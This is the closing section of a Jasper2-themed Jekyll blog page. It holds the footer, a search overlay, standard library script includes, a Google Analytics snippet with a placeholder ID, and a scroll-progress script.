                <section class="poweredby">Proudly published with <a href="https://jekyllrb.com/">Jekyll</a> &
                    <a href="https://pages.github.com/" target="_blank" rel="noopener">GitHub Pages</a> using
                    <a href="https://github.com/jekyllt/jasper2" target="_blank" rel="noopener">Jasper2</a></section>
                <nav class="site-footer-nav">
                    <a href="/">Latest Posts</a>
                    
                    
                    <a href="https://ghost.org" target="_blank" rel="noopener">Ghost</a>
                </nav>
            </div>
        </footer>

    </div>

    <!-- The big email subscribe modal content -->
    
    <div id="subscribe" class="subscribe-overlay">
        <a class="subscribe-overlay-close" href="#"></a>
        <div class="subscribe-overlay-content">
            
            <h1 class="subscribe-overlay-title">Search wind-flow Tech Blog</h1>
            <p class="subscribe-overlay-description">
            lunr.js를 이용한 posts 검색 </p>
            <span id="searchform" method="post" action="/subscribe/" class="">
    <input class="confirm" type="hidden" name="confirm"  />
    <input class="location" type="hidden" name="location"  />
    <input class="referrer" type="hidden" name="referrer"  />

    <div class="form-group">
        <input class="subscribe-email" onkeyup="myFunc()" 
               id="searchtext" type="text" name="searchtext"  
               placeholder="Search..." />
    </div>
    <script type="text/javascript">
        function myFunc() {
            if(event.keyCode == 13) {
                var url = encodeURIComponent($("#searchtext").val());
                location.href = "/search.html?query=" + url;
            }
        }
    </script>
</span>
        </div>
    </div>
    

    <!-- highlight.js -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.10.0/components/prism-abap.min.js"></script>
    <script>$(document).ready(function() {
      $('pre code').each(function(i, block) {
        hljs.highlightBlock(block);
      });
    });</script>

    <!-- jQuery + Fitvids, which makes all video embeds responsive -->
    <script
        src="https://code.jquery.com/jquery-3.2.1.min.js"
        integrity="sha256-hwg4gsxgFZhOsEEamdOYGBf13FyQuiTwlAQgxVSNgt4="
        crossorigin="anonymous">
    </script>
    <script type="text/javascript" src="/assets/js/jquery.fitvids.js"></script>
    <script type="text/javascript" src="https://demo.ghost.io/assets/js/jquery.fitvids.js?v=724281a32e"></script>


    <!-- Paginator increased to "infinit" in _config.yml -->
    <!-- if paginator.posts  -->
    <!-- <script>
        var maxPages = parseInt('');
    </script>
    <script src="/assets/js/infinitescroll.js"></script> -->
    <!-- /endif -->

    


    <!-- Add Google Analytics  -->
    <!-- Google Analytics Tracking code -->
 <script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-xxxxxxxx-x', 'auto');
  ga('send', 'pageview');

 </script>


    <!-- The #block helper will pull in data from the #contentFor other template files. In this case, there's some JavaScript which we only want to use in post.hbs, but it needs to be included down here, after jQuery has already loaded. -->
    
        <script>

// NOTE: Scroll performance is poor in Safari
// - this appears to be due to the events firing much more slowly in Safari.
//   Dropping the scroll event and using only a raf loop results in smoother
//   scrolling but continuous processing even when not scrolling
$(document).ready(function () {
    // Start fitVids
    var $postContent = $(".post-full-content");
    $postContent.fitVids();
    // End fitVids

    var progressBar = document.querySelector('progress');
    var header = document.querySelector('.floating-header');
    var title = document.querySelector('.post-full-title');

    var lastScrollY = window.scrollY;
    var lastWindowHeight = window.innerHeight;
    var lastDocumentHeight = $(document).height();
    var ticking = false;

    function onScroll() {
        lastScrollY = window.scrollY;
        requestTick();
    }

    function onResize() {
        lastWindowHeight = window.innerHeight;
        lastDocumentHeight = $(document).height();
        requestTick();
    }

    function requestTick() {
        if (!ticking) {
            requestAnimationFrame(update);
        }
        ticking = true;
    }

    function update() {
        var trigger = title.getBoundingClientRect().top + window.scrollY;
        var triggerOffset = title.offsetHeight + 35;
        var progressMax = lastDocumentHeight - lastWindowHeight;

        // show/hide floating header
        if (lastScrollY >= trigger + triggerOffset) {
            header.classList.add('floating-active');
        } else {
            header.classList.remove('floating-active');
        }

        progressBar.setAttribute('max', progressMax);
        progressBar.setAttribute('value', lastScrollY);

        ticking = false;
    }

    window.addEventListener('scroll', onScroll, {passive: true});
    window.addEventListener('resize', onResize, false);

    update();
});
</script>

    

    <!-- Ghost outputs important scripts and data with this tag - it should always be the very last thing before the closing body tag -->
    <!-- ghost_foot -->

</body>
</html>
